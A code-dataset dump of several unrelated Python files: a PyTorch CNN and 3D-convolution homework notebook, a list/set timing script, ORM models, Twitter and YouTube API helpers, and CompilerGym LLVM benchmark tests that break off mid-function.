# For each network architecture that you try, you should tune the learning rate and regularization strength. When doing this there are a couple important things to keep in mind:
#
# - If the parameters are working well, you should see improvement within a few hundred iterations
# - Remember the coarse-to-fine approach for hyperparameter tuning: start by testing a large range of hyperparameters for just a few training iterations to find the combinations of parameters that are working at all.
# - Once you have found some sets of parameters that seem to work, search more finely around these parameters. You may need to train for more epochs.
# - You should use the validation set for hyperparameter search, and save your test set for evaluating your architecture on the best parameters as selected by the validation set.
#
# ### Going above and beyond
# If you are feeling adventurous there are many other features you can implement to try and improve your performance. You are **not required** to implement any of these; however they would be good things to try.
#
# - Alternative update steps: For the assignment we implemented SGD+momentum, RMSprop, and Adam; you could try alternatives like AdaGrad or AdaDelta.
# - Alternative activation functions such as leaky ReLU, parametric ReLU, ELU, or MaxOut.
# - Model ensembles
# - Data augmentation
# - New Architectures
# - [ResNets](https://arxiv.org/abs/1512.03385) where the input from the previous layer is added to the output.
# - [DenseNets](https://arxiv.org/abs/1608.06993) where inputs into previous layers are concatenated together.
# - [This blog has an in-depth overview](https://chatbotslife.com/resnets-highwaynets-and-densenets-oh-my-9bb15918ee32)
#
# If you do decide to implement something extra, clearly describe it in the "Extra Credit Description" cell below.
#
# ### What we expect
# At the very least, you should be able to train a ConvNet that gets at least 55% accuracy on the validation set. This is just a lower bound - if you are careful it should be possible to get accuracies much higher than that! Extra credit points will be awarded for particularly high-scoring models or unique approaches.
#
# You should use the space below to experiment and train your network.
#
#
# In[ ]:
train(fixed_model_base, loss_fn, optimizer,image_dataloader_train, num_epochs=4)
check_accuracy(fixed_model, image_dataloader_val)
# ### GPU! (This part is optional, 0 points)
#
# If you have access to GPU, you can make the code run on GPU, it would be much faster.
#
# Now, we're going to switch the dtype of the model and our data to the GPU-friendly tensors, and see what happens... everything is the same, except we are casting our model and input tensors as this new dtype instead of the old one.
#
# If this returns false, or otherwise fails in a not-graceful way (i.e., with some error message), you may not have an NVIDIA GPU available on your machine.
# In[75]:
# Verify that CUDA is properly configured and you have a GPU available
torch.cuda.is_available()
# In[76]:
import copy
gpu_dtype = torch.cuda.FloatTensor
# Deep-copy the CPU model and move the copy to the GPU; the commented-out
# .type(gpu_dtype) calls were superseded by .cuda().
fixed_model_gpu = copy.deepcopy(fixed_model_base)#.type(gpu_dtype)
fixed_model_gpu.cuda()
x_gpu = torch.randn(4, 3, 64, 64).cuda()#.type(gpu_dtype)
x_var_gpu = Variable(x_gpu)#type(gpu_dtype)) # Construct a PyTorch Variable out of your input data
ans = fixed_model_gpu(x_var_gpu) # Feed it through the model!
# Check to make sure what comes out of your model
# is the right dimensionality... this should be True
# if you've done everything correctly
np.array_equal(np.array(ans.size()), np.array([4, 10]))
# Run the following cell to evaluate the performance of the forward pass running on the CPU:
# In[77]:
get_ipython().run_cell_magic('timeit', '', 'ans = fixed_model(x_var)')
# ... and now the GPU:
# In[78]:
get_ipython().run_cell_magic('timeit', '', 'torch.cuda.synchronize() # Make sure there are no pending GPU computations\nans = fixed_model_gpu(x_var_gpu) # Feed it through the model! \ntorch.cuda.synchronize() # Make sure there are no pending GPU computations')
# You should observe that even a simple forward pass like this is significantly faster on the GPU. So for the rest of the assignment (and when you go train your models in assignment 3 and your project!), you should use the GPU datatype for your model and your tensors: as a reminder that is *torch.cuda.FloatTensor* (in our notebook here as *gpu_dtype*)
# Move the loss function to the GPU as well; the optimizer only holds
# references to the (already-moved) model parameters.
# In[79]:
loss_fn = nn.CrossEntropyLoss().cuda()
optimizer = optim.RMSprop(fixed_model_gpu.parameters(), lr=1e-4)
# In[80]:
def train(model, loss_fn, optimizer, dataloader, num_epochs = 1):
    """Train `model` on GPU batches from `dataloader` for `num_epochs` epochs.

    Prints validation accuracy at the start of every epoch and logs the
    running loss every `print_every` minibatches (module-level constant).
    Relies on the module-level `image_dataloader_val` for validation.
    """
    for epoch in range(num_epochs):
        print('Starting epoch %d / %d' % (epoch + 1, num_epochs))
        # BUG FIX: previously evaluated the global fixed_model_gpu instead of
        # the `model` parameter, and did so AFTER model.train(), which left
        # the model in eval mode for the whole epoch (check_accuracy calls
        # .eval()). Evaluate first, then switch to training mode — same
        # order as train_3d below.
        check_accuracy(model, image_dataloader_val)  # accuracy on the validation set
        model.train()
        for t, sample in enumerate(dataloader):
            x_var = Variable(sample['image'].cuda())
            y_var = Variable(sample['Label'].cuda().long())
            scores = model(x_var)
            loss = loss_fn(scores, y_var)
            if (t + 1) % print_every == 0:
                print('t = %d, loss = %.4f' % (t + 1, loss.data[0]))
            # Standard step: clear stale gradients, backprop, update weights.
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
def check_accuracy(model, loader):
    """Print `model`'s classification accuracy over all samples in `loader`.

    Images are moved to the GPU for the forward pass; predictions and
    labels are compared on the CPU. Leaves the model in eval mode.
    """
    num_correct = 0
    num_samples = 0
    model.eval()  # test mode (the opposite of model.train())
    for sample in loader:
        x_var = Variable(sample['image'].cuda())
        # FIX: labels were copied to the GPU and immediately back to the CPU
        # (.cuda() then .cpu()); keep them on the CPU where the numpy
        # comparison happens.
        y = sample['Label']
        scores = model(x_var)
        # argmax over the class dimension, brought back to the CPU.
        _, preds = scores.data.cpu().max(1)
        num_correct += (preds.numpy() == y.numpy()).sum()
        num_samples += preds.size(0)
    acc = float(num_correct) / num_samples
    print('Got %d / %d correct (%.2f)' % (num_correct, num_samples, 100 * acc))
# Run on GPU!
# In[47]:
# Seed CUDA RNG for reproducibility, re-initialize weights, and train on GPU.
torch.cuda.random.manual_seed(873271)
fixed_model_gpu.apply(reset)
fixed_model_gpu.train()
train(fixed_model_gpu, loss_fn, optimizer,image_dataloader_train, num_epochs=4)
check_accuracy(fixed_model_gpu, image_dataloader_train)# check accuracy on the training set
# In[48]:
check_accuracy(fixed_model_gpu, image_dataloader_val)# check accuracy on the validation set
# In[46]:
def predict_on_test(model, loader):
    """Write per-sample class predictions for `loader` to 'results.csv'.

    The CSV has a 'Id,Class' header and one row per sample, ids counting
    up from 0 in loader order. Returns the number of predictions written.
    """
    model.eval()  # test mode (the opposite of model.train())
    count = 0
    # FIX: use a context manager so the file is closed even if a batch
    # raises mid-loop (the original left the handle open on error).
    with open('results.csv', 'w') as results:
        results.write('Id' + ',' + 'Class' + '\n')
        for sample in loader:
            x_var = Variable(sample['image'])
            scores = model(x_var)
            _, preds = scores.data.max(1)
            for i in range(len(preds)):
                results.write(str(count) + ',' + str(preds[i]) + '\n')
                count += 1
    return count
# Generate results.csv for the Kaggle submission and report how many rows
# were written.
count=predict_on_test(fixed_model, image_dataloader_test)
print(count)
# ### 3D Convolution on video clips (25 points+10 extra points)
# 3D convolution is for videos; it has one more dimension than 2D convolution. You can find the documentation for 3D convolution here: http://pytorch.org/docs/master/nn.html#torch.nn.Conv3d. In our dataset, each clip is a video of 3 frames. Let's classify each clip rather than each image using 3D convolution.
# We offer the data loader, the train_3d and check_accuracy
# In[49]:
class ActionClipDataset(Dataset):
    """Dataset of 3-frame action video clips.

    Each clip lives in <root_dir>/<00001..>/ as frames 1.jpg..3.jpg.
    A sample dict contains the stacked clip tensor, the zero-padded folder
    name, and (when labels were supplied) a zero-based class label.
    """
    def __init__(self, root_dir,labels=[], transform=None):
        """
        Args:
            root_dir (string): Directory with one sub-folder per clip.
            labels: sequence of 1-based labels, one per clip; leave empty
                for the unlabeled test set.
                NOTE(review): mutable default argument — shared across
                instances; harmless here only because it is never mutated.
            transform (callable, optional): used only as a truthy flag — if
                set, frames are stacked and transposed to
                (frames, channels, H, W); the callable itself is never
                invoked.
        """
        self.root_dir = root_dir
        self.transform = transform
        # One sub-folder per clip under root_dir.
        self.length=len(os.listdir(self.root_dir))
        self.labels=labels
    def __len__(self):
        return self.length
    def __getitem__(self, idx):
        # Clip folders are 1-based, zero-padded to five digits ('00001', ...).
        folder=idx+1
        folder=format(folder,'05d')
        clip=[]
        if len(self.labels)!=0:
            # Stored labels are 1-based; convert to a 0-based class index.
            Label=self.labels[idx][0]-1
        # Load the clip's three frames in order.
        for i in range(3):
            imidx=i+1
            imgname=str(imidx)+'.jpg'
            img_path = os.path.join(self.root_dir,
                                    folder,imgname)
            image = Image.open(img_path)
            image=np.array(image)
            clip.append(image)
        if self.transform:
            # (frames, H, W, C) -> (frames, C, H, W), the layout Conv3d expects.
            clip=np.asarray(clip)
            clip=np.transpose(clip, (0,3,1,2))
        clip = torch.from_numpy(np.asarray(clip))
        if len(self.labels)!=0:
            sample={'clip':clip,'Label':Label,'folder':folder}
        else:
            sample={'clip':clip,'folder':folder}
        return sample
# Smoke-test the clip dataset: print shapes/labels for the first 10 clips.
clip_dataset=ActionClipDataset(root_dir='./data/trainClips/', labels=label_train,transform=T.ToTensor())#/home/tqvinh/Study/CSE512/cse512-s18/hw2data/trainClips/
for i in range(10):
    sample=clip_dataset[i]
    print(sample['clip'].shape)
    print(sample['Label'])
    print(sample['folder'])
# In[50]:
# Smoke-test batching: iterate a few minibatches and print their contents.
clip_dataloader = DataLoader(clip_dataset, batch_size=4,
                        shuffle=True, num_workers=4)
for i,sample in enumerate(clip_dataloader):
    print(i,sample['clip'].shape,sample['folder'],sample['Label'])
    if i>20:
        break
# In[51]:
# Train/val/test loaders for the 3D-convolution experiments. The test
# loader is unshuffled so predictions line up with clip ids.
clip_dataset_train=ActionClipDataset(root_dir='./data/trainClips/',labels=label_train,transform=T.ToTensor())
clip_dataloader_train = DataLoader(clip_dataset_train, batch_size=16,
                        shuffle=True, num_workers=4)
clip_dataset_val=ActionClipDataset(root_dir='./data/valClips/',labels=label_val,transform=T.ToTensor())
clip_dataloader_val = DataLoader(clip_dataset_val, batch_size=16,
                        shuffle=True, num_workers=4)
clip_dataset_test=ActionClipDataset(root_dir='./data/testClips/',labels=[],transform=T.ToTensor())
clip_dataloader_test = DataLoader(clip_dataset_test, batch_size=16,
                        shuffle=False, num_workers=4)
# Write the Flatten for 3D convolution feature maps.
# In[52]:
class Flatten3d(nn.Module):
    """Collapse a 5-D conv feature map (N, C, D, H, W) into (N, C*D*H*W)."""

    def forward(self, x):
        # Unpack the five dimensions, then merge all but the batch axis
        # into a single feature vector per clip.
        n, c, d, h, w = x.size()
        return x.view(n, c * d * h * w)
# Design a network using 3D convolution on videos for video classification.
# In[58]:
fixed_model_3d = nn.Sequential( # You fill this in!
                ###############7th To Do (16 points)#########################
                # 3x(2x2x2) conv -> ReLU -> pool over spatial dims only.
                nn.Conv3d(in_channels = 3, out_channels = 50, kernel_size = 2, stride = 1),
                nn.ReLU(inplace=True),
                nn.MaxPool3d((1, 2, 2), stride = 2),
                # Second conv stage: 1x3x3 kernels keep the temporal depth.
                nn.Conv3d(in_channels = 50, out_channels = 100, kernel_size = (1, 3, 3), stride = 1),
                nn.ReLU(inplace = True),
                nn.MaxPool3d((1, 3, 3), stride = 2),
                nn.Dropout3d(0.1),
                Flatten3d(),
                nn.ReLU(inplace=True),
                # 19600 = flattened feature size for 3x64x64 input clips.
                nn.Linear(19600, 10),
                # NOTE(review): CrossEntropyLoss (used below) already applies
                # log-softmax internally, so this layer applies it twice;
                # consider removing it (would change trained behavior).
                nn.LogSoftmax()
                ###############################
            )
fixed_model_3d = fixed_model_3d.type(dtype)
# Sanity-check the output shape with a random batch of 32 clips.
x = torch.randn(32,3, 3, 64, 64).type(dtype)
x_var = Variable(x).type(dtype) # Construct a PyTorch Variable out of your input data
ans = fixed_model_3d(x_var)
np.array_equal(np.array(ans.size()), np.array([32, 10]))
#Accuracy 62 iterations 6
#Accuracy 62 iterations 6
# ### Describe what you did (4 points)
#
# In the cell below you should write an explanation of what you did, any additional features that you implemented, and any visualizations or graphs that you make in the process of training and evaluating your network.
# 8th To Do
# Tell us here:
# * 2X2X2 Convolution layer with 50 filters
# * ReLU layer inplace True
# * Max Pooling layer with window size (1, 2, 2) stride = 2
# * 1X3X3 Convolution layer with 100 filters
# * ReLU layer with inplace True
# * Max Pooling layer with window size (1, 3, 3) stride = 2
# * dropout layer with penalty 0.1
# * flattening
# * ReLU layer with inplace True
# * Affine layer
# * LogSoftmax Layer
# In[59]:
# Loss and optimizer for the 3D model, cast to the same tensor type
# (`dtype`) as the model and its inputs.
loss_fn = nn.CrossEntropyLoss().type(dtype)
optimizer = optim.RMSprop(fixed_model_3d.parameters(), lr=1e-4)
# In[60]:
def train_3d(model, loss_fn, optimizer,dataloader,num_epochs = 1):
    """Train the 3D-conv `model` on clips from `dataloader`.

    Prints validation accuracy (via the module-level clip_dataloader_val)
    at the start of each epoch and logs the loss every `print_every`
    minibatches (module-level constant).
    """
    for epoch in range(num_epochs):
        print('Starting epoch %d / %d' % (epoch + 1, num_epochs))
        # BUG FIX: previously evaluated the global fixed_model_3d instead of
        # the `model` parameter (they coincide today, but diverge for any
        # other model passed in).
        check_accuracy_3d(model, clip_dataloader_val)
        model.train()
        for t, sample in enumerate(dataloader):
            x_var = Variable(sample['clip'].type(dtype))
            y_var = Variable(sample['Label'].type(dtype).long())
            scores = model(x_var)
            loss = loss_fn(scores, y_var)
            if (t + 1) % print_every == 0:
                print('t = %d, loss = %.4f' % (t + 1, loss.data[0]))
            # Standard step: clear stale gradients, backprop, update weights.
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
def check_accuracy_3d(model, loader):
    """Print `model`'s classification accuracy over all clips in `loader`.

    Clips are cast to the module-level `dtype` for the forward pass;
    predictions and labels are compared on the CPU. Leaves the model in
    eval mode.
    """
    '''
    if loader.dataset.train:
        print('Checking accuracy on validation set')
    else:
        print('Checking accuracy on test set')
    '''
    num_correct = 0
    num_samples = 0
    model.eval() # Put the model in test mode (the opposite of model.train(), essentially)
    for t, sample in enumerate(loader):
        x_var = Variable(sample['clip'].type(dtype))
        # NOTE(review): when dtype is a CUDA tensor type this casts the
        # labels to the GPU and straight back — a redundant round-trip.
        y_var = sample['Label'].type(dtype)
        y_var=y_var.cpu()
        scores = model(x_var)
        # argmax over the class dimension, brought back to the CPU.
        _, preds = scores.data.cpu().max(1)
        #print(preds)
        #print(y_var)
        num_correct += (preds.numpy() == y_var.numpy()).sum()
        num_samples += preds.size(0)
    acc = float(num_correct) / num_samples
    print('Got %d / %d correct (%.2f)' % (num_correct, num_samples, 100 * acc))
# In[61]:
# Seed CUDA RNG, re-initialize weights, train the 3D model for 5 epochs,
# then report train and validation accuracy.
torch.cuda.random.manual_seed(782374)
fixed_model_3d.apply(reset)
fixed_model_3d.train()
train_3d(fixed_model_3d, loss_fn, optimizer,clip_dataloader_train, num_epochs=5)
fixed_model_3d.eval()
check_accuracy_3d(fixed_model_3d, clip_dataloader_train)
check_accuracy_3d(fixed_model_3d, clip_dataloader_val)
# Test your 3d convolution model on the validation set. You don't need to submit the result of this part to kaggle.
# Test your model on the test set, predict_on_test_3d() will generate a file named 'results_3d.csv'. Please submit the csv file to kaggle https://www.kaggle.com/c/cse512springhw3video
# The highest 3 entries get extra 10 points.
#
# In[62]:
def predict_on_test_3d(model, loader):
    """Write per-clip class predictions for `loader` to 'results_3d.csv'.

    The CSV has a 'Id,Class' header and one row per clip, ids counting up
    from 0 in loader order. Returns the number of predictions written.
    """
    model.eval()  # test mode (the opposite of model.train())
    count = 0
    # FIX: use a context manager so the file is closed even if a batch
    # raises mid-loop (the original left the handle open on error).
    with open('results_3d.csv', 'w') as results:
        results.write('Id' + ',' + 'Class' + '\n')
        for sample in loader:
            x_var = Variable(sample['clip'].type(dtype))
            scores = model(x_var)
            _, preds = scores.data.max(1)
            for i in range(len(preds)):
                results.write(str(count) + ',' + str(preds[i]) + '\n')
                count += 1
    return count
# Generate results_3d.csv for the Kaggle submission and report row count.
count=predict_on_test_3d(fixed_model_3d, clip_dataloader_test)
print(count)
# * Rank on kaggle: 27
# * Score: 61.80428
# In[ ]:
|
996,871 | cf0ab04f13d89f1d9a214857e0ddf6d434343b55 | # file: intersect.py
"""
Measuring the time for searching in a list and a set including
creation time of the data structure.
"""
import timeit
from searching import compare
def intersect_list(n):
    """Measure the run time for intersecting two lists.

    Returns (run_time, in_both), where in_both preserves the order of the
    first list. Creation of the lists is excluded from the timing.
    """
    # FIX: materialize real lists. Under Python 3, `x in range(...)` is an
    # O(1) arithmetic check, which would defeat the point of benchmarking
    # the O(n) linear search that list membership performs.
    list_a = list(range(n))
    list_b = list(range(n - 3, 2 * n))
    start = timeit.default_timer()
    in_both = [x for x in list_a if x in list_b]
    run_time = timeit.default_timer() - start
    return run_time, in_both
def intersect_set(n):
    """Measure the run time for intersecting two sets.

    Returns (run_time, in_both); building the sets is excluded from the
    timing, only the intersection itself is measured.
    """
    left = set(range(n))
    right = set(range(n - 3, 2 * n))
    started_at = timeit.default_timer()
    shared = left & right
    elapsed = timeit.default_timer() - started_at
    return elapsed, shared
def calculate_intersect(n):
    """Time list vs. set intersection for problem size n.

    Returns (list_time, set_time, speedup), where speedup is how many
    times faster the set-based intersection ran.
    """
    time_list, found_list = intersect_list(n)
    time_set, found_set = intersect_set(n)
    # Both strategies must agree on the actual intersection.
    assert found_set == set(found_list)
    speedup = time_list / time_set
    return time_list, time_set, speedup
if __name__ == '__main__':
    # Benchmark list vs. set intersection across the sizes `compare` sweeps.
    compare(func=calculate_intersect, header='Intersection')
|
996,872 | a781d858c1e8c02c4bd691f9fe847fe576644d9a | from mongodm.base import BaseDocument
class Document(BaseDocument):
    # Marker subclass of BaseDocument; adds no behavior of its own,
    # presumably distinguishing standalone documents from embedded ones.
    pass
class EmbeddedDocument(BaseDocument):
    # Marker subclass of BaseDocument; adds no behavior of its own,
    # presumably for documents nested inside other documents.
    pass
996,873 | 1edec8277868635625b27a27dd4f1a269c1df6c7 | from TrainOfHope import os, db
from datetime import datetime
class Event(db.Model):
    """A scheduled event (title, location, date/time) with its associated
    Competence rows (one-to-many via Competence.event_id)."""
    __tablename__ = "events"
    id = db.Column(db.Integer, nullable=False, primary_key=True, autoincrement=True)
    title = db.Column(db.Text,nullable=False)
    location = db.Column(db.Text,nullable=False)
    description = db.Column(db.Text, nullable=True)
    date = db.Column(db.Date, nullable=True)
    # Free-text time of day (a Text column, not db.Time).
    time = db.Column(db.Text, nullable=True)
    # Competences linked to this event, ordered by id; creates the
    # 'events' backref on Competence.
    competence = db.relationship("Competence", order_by="Competence.id", backref="events")
    def __init__(self, title, location, description, date, time):
        self.title = title
        self.location = location
        self.description = description
        self.date = date
        self.time = time
class Competence(db.Model):
    """A skill entry attached to an Event.

    needed_skill is required; coming_skill is optional — presumably the
    skill actually being brought to the event; confirm with callers.
    """
    __tablename__ = "competences"
    id = db.Column(db.Integer, nullable=False, primary_key=True, autoincrement=True)
    needed_skill = db.Column(db.Text, nullable=False)
    coming_skill = db.Column(db.Text, nullable=True)
    # Owning event (see Event.competence relationship).
    event_id = db.Column(db.Integer, db.ForeignKey('events.id'), nullable=False)
    def __init__(self, needed_skill, coming_skill, event_id):
        self.needed_skill = needed_skill
        self.coming_skill = coming_skill
        self.event_id = event_id
|
996,874 | 86e69cc691520d41209e9e3b1062ab281b93a296 | #! C:\Users\Gherardelli\Documents\PortableApps\WinPython\python-2.7.10\python.exe
'''
Define authentication and other basic functions for Twitter interaction
'''
import twitter, json, os
CONSUMER_KEY = ""
CONSUMER_SECRET = ""
ACCESS_TOKEN = ""
ACCESS_SECRET = ""
def t_auth(consumer_key, consumer_secret, access_token, access_secret):
    """Return a twitter.Twitter API client authenticated via OAuth1."""
    auth = twitter.oauth.OAuth(access_token, access_secret,
                               consumer_key, consumer_secret)
    twitter_api = twitter.Twitter(auth=auth)
    return twitter_api
def process(tweet):
    # Pretty-print a tweet (JSON-serializable dict) to stdout (Python 2).
    print json.dumps(tweet, indent = 2)
# Module-level API client, built at import time with the credentials above
# (empty placeholders here — fill in before use).
t = t_auth(CONSUMER_KEY, CONSUMER_SECRET, ACCESS_TOKEN, ACCESS_SECRET)
|
996,875 | 1362a720abe444302c291ca65723fee7189fd0be | import gdata.youtube
import gdata.youtube.service
from urlparse import parse_qs, urlsplit
from sciencecombinator.settings import YOUTUBE_SECRET_KEY
from science_combinator.models import AcceptedCategory
class YoutubeService(object):
    """Thin wrapper over the gdata YouTube API that returns search results
    filtered by the AcceptedCategory table (Python 2)."""
    def _is_valid_video(self, video, categories):
        # Accept a video when its first media category is a case-insensitive
        # substring of any accepted category name.
        cat = video.media.category[0].text
        for category in categories:
            if cat.lower() in category.lower():
                return True
        return False
    def search_videos(self, needle):
        """Search YouTube for `needle`; return a list of dicts for videos
        whose category matches an AcceptedCategory, with all values
        normalized to UTF-8 byte strings."""
        service = gdata.youtube.service.YouTubeService()
        service.developer_key = YOUTUBE_SECRET_KEY
        service.client_id = "Science Combinator"
        query = gdata.youtube.service.YouTubeVideoQuery()
        query.vq = needle
        feed = service.YouTubeQuery(query)
        categories = [cat.name for cat in AcceptedCategory.objects.all()]
        videos = []
        for entry in feed.entry:
            if not self._is_valid_video(entry, categories):
                continue
            url = entry.media.player.url
            # The video id is the 'v' query parameter of the player URL.
            qs = parse_qs(urlsplit(url).query)
            video = {
                "remote_id": qs["v"][0],
                "title": entry.media.title.text,
                "description": entry.media.description.text,
                "category": entry.media.category[0].text,
                "published": entry.published.text,
                "thumbnail": entry.media.thumbnail[0].url,
                "duration": entry.media.duration.seconds,
            }
            self._normalize(video)
            videos.append(video)
        return videos
    def _normalize(self, video):
        # Force every value to a UTF-8 byte string (Python 2 idiom).
        # NOTE(review): the bare except silently replaces any non-encodable
        # value (e.g. a None description) with "" — broad, but best-effort
        # by design; a narrower except (AttributeError,) would be safer.
        for key, value in video.iteritems():
            try:
                video[key] = value.encode("utf-8")
            except:
                video[key] = ""
996,876 | 8e0af4d27d8355f231a4029ec90694e86405c0d5 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Tests for LLVM benchmark handling."""
import re
import subprocess
import tempfile
from pathlib import Path
import gym
import pytest
from compiler_gym.datasets import Benchmark
from compiler_gym.envs import LlvmEnv, llvm
from compiler_gym.errors import BenchmarkInitError
from compiler_gym.service.proto import Benchmark as BenchmarkProto
from compiler_gym.service.proto import File
from compiler_gym.third_party import llvm as llvm_paths
from compiler_gym.util.runfiles_path import runfiles_path
from compiler_gym.util.temporary_working_directory import temporary_working_directory
from tests.pytest_plugins.common import bazel_only
from tests.test_main import main
# Pull in the shared LLVM fixtures (provides the `env: LlvmEnv` fixture).
pytest_plugins = ["tests.pytest_plugins.llvm"]
# The path of an IR file that assembles but does not compile.
INVALID_IR_PATH = runfiles_path("tests/llvm/invalid_ir.ll")
EXAMPLE_BITCODE_FILE = runfiles_path(
    "compiler_gym/third_party/cbench/cbench-v1/crc32.bc"
)
# Expected IrInstructionCount observation for the crc32 bitcode above.
EXAMPLE_BITCODE_IR_INSTRUCTION_COUNT = 242
def test_reset_invalid_benchmark(env: LlvmEnv):
    """Resetting with an unknown benchmark name raises LookupError."""
    invalid_benchmark = "an invalid benchmark"
    with pytest.raises(
        LookupError, match=f"Dataset not found: benchmark://{invalid_benchmark}"
    ):
        env.reset(benchmark=invalid_benchmark)


def test_invalid_benchmark_data(env: LlvmEnv):
    """Benchmark contents that are not bitcode fail at reset()."""
    benchmark = Benchmark.from_file_contents(
        "benchmark://new", "Invalid bitcode".encode("utf-8")
    )
    with pytest.raises(
        BenchmarkInitError, match='Failed to parse LLVM bitcode: "benchmark://new"'
    ):
        env.reset(benchmark=benchmark)


def test_invalid_benchmark_missing_file(env: LlvmEnv):
    """A benchmark proto with no program payload is rejected."""
    benchmark = Benchmark(
        BenchmarkProto(
            uri="benchmark://new",
        )
    )
    with pytest.raises(ValueError, match="No program set"):
        env.reset(benchmark=benchmark)


def test_benchmark_path_empty_file(env: LlvmEnv):
    """An empty .bc file fails to parse as bitcode."""
    with tempfile.TemporaryDirectory() as tmpdir:
        tmpdir = Path(tmpdir)
        (tmpdir / "test.bc").touch()
        benchmark = Benchmark.from_file("benchmark://new", tmpdir / "test.bc")
        with pytest.raises(BenchmarkInitError, match="Failed to parse LLVM bitcode"):
            env.reset(benchmark=benchmark)


def test_invalid_benchmark_path_contents(env: LlvmEnv):
    """A .bc file containing garbage text fails to parse as bitcode."""
    with tempfile.TemporaryDirectory() as tmpdir:
        tmpdir = Path(tmpdir)
        with open(str(tmpdir / "test.bc"), "w") as f:
            f.write("Invalid bitcode")
        benchmark = Benchmark.from_file("benchmark://new", tmpdir / "test.bc")
        with pytest.raises(BenchmarkInitError, match="Failed to parse LLVM bitcode"):
            env.reset(benchmark=benchmark)


def test_benchmark_path_invalid_scheme(env: LlvmEnv):
    """Only file:/// URIs are accepted for benchmark program data."""
    benchmark = Benchmark(
        BenchmarkProto(
            uri="benchmark://new", program=File(uri="invalid_scheme://test")
        ),
    )
    with pytest.raises(
        ValueError,
        match=(
            "Invalid benchmark data URI. "
            'Only the file:/// scheme is supported: "invalid_scheme://test"'
        ),
    ):
        env.reset(benchmark=benchmark)
def test_custom_benchmark(env: LlvmEnv):
    """A valid user benchmark can be loaded via reset()."""
    benchmark = Benchmark.from_file("benchmark://new", EXAMPLE_BITCODE_FILE)
    env.reset(benchmark=benchmark)
    assert env.benchmark == "benchmark://new"


def test_custom_benchmark_constructor():
    """A custom benchmark can also be passed to gym.make() directly."""
    benchmark = Benchmark.from_file("benchmark://new", EXAMPLE_BITCODE_FILE)
    with gym.make("llvm-v0", benchmark=benchmark) as env:
        env.reset()
        assert env.benchmark == "benchmark://new"


def test_make_benchmark_single_bitcode(env: LlvmEnv):
    """make_benchmark() on a single .bc file embeds its contents."""
    benchmark = llvm.make_benchmark(EXAMPLE_BITCODE_FILE)
    assert benchmark == f"benchmark://file-v0{EXAMPLE_BITCODE_FILE}"
    assert benchmark.uri.scheme == "benchmark"
    assert benchmark.uri.dataset == "file-v0"
    with open(EXAMPLE_BITCODE_FILE, "rb") as f:
        contents = f.read()
    assert benchmark.proto.program.contents == contents
    env.reset(benchmark=benchmark)
    assert env.benchmark == benchmark.uri
    assert env.observation["IrInstructionCount"] == EXAMPLE_BITCODE_IR_INSTRUCTION_COUNT


@bazel_only
def test_make_benchmark_single_ll():
    """Test passing a single .ll file into make_benchmark()."""
    benchmark = llvm.make_benchmark(INVALID_IR_PATH)
    assert str(benchmark.uri).startswith("benchmark://user-v0/")
    assert benchmark.uri.scheme == "benchmark"
    assert benchmark.uri.dataset == "user-v0"


def test_make_benchmark_single_clang_job(env: LlvmEnv):
    """A single C source file is compiled into a benchmark."""
    with tempfile.TemporaryDirectory() as d:
        source = Path(d) / "input.c"
        with open(str(source), "w") as f:
            f.write("int A() { return 0; }")

        benchmark = llvm.make_benchmark(str(source))
        env.reset(benchmark=benchmark)
        assert env.benchmark == benchmark.uri
        print(env.observation["Ir"])
        assert re.search(r"define (dso_local )?i32 @A\(\)", env.observation["Ir"])


def test_make_benchmark_split_clang_job(env: LlvmEnv):
    """Two C source files are compiled and linked into one benchmark."""
    with tempfile.TemporaryDirectory() as d:
        source_1 = Path(d) / "a.c"
        source_2 = Path(d) / "b.c"
        with open(str(source_1), "w") as f:
            f.write("int B() { return A(); }")
        with open(str(source_2), "w") as f:
            f.write("int A() { return 0; }")

        benchmark = llvm.make_benchmark(
            [
                str(source_1),
                str(source_2),
            ]
        )
        env.reset(benchmark=benchmark)
        assert env.benchmark == benchmark.uri
        print(env.observation["Ir"])
        # Both translation units must be present in the linked IR.
        assert re.search(r"define (dso_local )?i32 @A\(\)", env.observation["Ir"])
        assert re.search(r"define (dso_local )?i32 @B\(\)", env.observation["Ir"])


def test_make_benchmark_single_clang_invocation_multiple_inputs():
    """One ClangInvocation with two inputs must fail (-o with multiple outputs)."""
    with tempfile.TemporaryDirectory() as d:
        source_1 = Path(d) / "a.c"
        source_2 = Path(d) / "b.c"
        with open(str(source_1), "w") as f:
            f.write("int B() { return A(); }")
        with open(str(source_2), "w") as f:
            f.write("int A() { return 0; }")

        # cannot specify -o when generating multiple output files
        with pytest.raises(OSError):
            llvm.make_benchmark(llvm.ClangInvocation([str(source_1), str(source_2)]))


def test_make_benchmark_undefined_symbol(env: LlvmEnv):
    """An undefined symbol still compiles, leaving an IR declaration."""
    with tempfile.TemporaryDirectory() as d:
        source = Path(d) / "a.c"
        with open(str(source), "w") as f:
            f.write("int main() { return A(); }")

        benchmark = llvm.make_benchmark(source)
        env.reset(benchmark=benchmark)
        assert env.benchmark == benchmark.uri
        print(env.observation["Ir"])
        assert re.search(r"declare (dso_local )?i32 @A\(\.\.\.\)", env.observation["Ir"])


def test_make_benchmark_missing_file():
    """A nonexistent input path raises FileNotFoundError (Path and str)."""
    with tempfile.TemporaryDirectory() as d:
        with pytest.raises(FileNotFoundError):
            llvm.make_benchmark(Path(d) / "a.c")

        with pytest.raises(FileNotFoundError):
            llvm.make_benchmark(str(Path(d) / "a.c"))


def test_make_benchmark_unrecognized_file_type():
    """An input with an unsupported extension is rejected."""
    with tempfile.TemporaryDirectory() as d:
        path = Path(d) / "foo.txt"
        path.touch()

        with pytest.raises(ValueError, match=r"Unrecognized file type"):
            llvm.make_benchmark(path)


def test_make_benchmark_clang_job_standard_libraries(env: LlvmEnv):
    """C++ sources using standard headers compile (system includes on)."""
    with tempfile.TemporaryDirectory() as d:
        source = Path(d) / "input.cc"
        with open(str(source), "w") as f:
            f.write('#include <stdio.h>\nint A() { printf(""); return 0; }')

        benchmark = llvm.make_benchmark(str(source))
        env.reset(benchmark=benchmark)
        assert env.benchmark == benchmark.uri
        print(env.observation["Ir"])
        assert re.search(r"define (dso_local )?i32 @_Z1Av\(\)", env.observation["Ir"])
        assert re.search(r"declare (dso_local )?i32 @printf", env.observation["Ir"])


def test_make_benchmark_invalid_clang_job():
    """A failing clang invocation surfaces as OSError with the returncode."""
    with pytest.raises(OSError, match="Compilation job failed with returncode"):
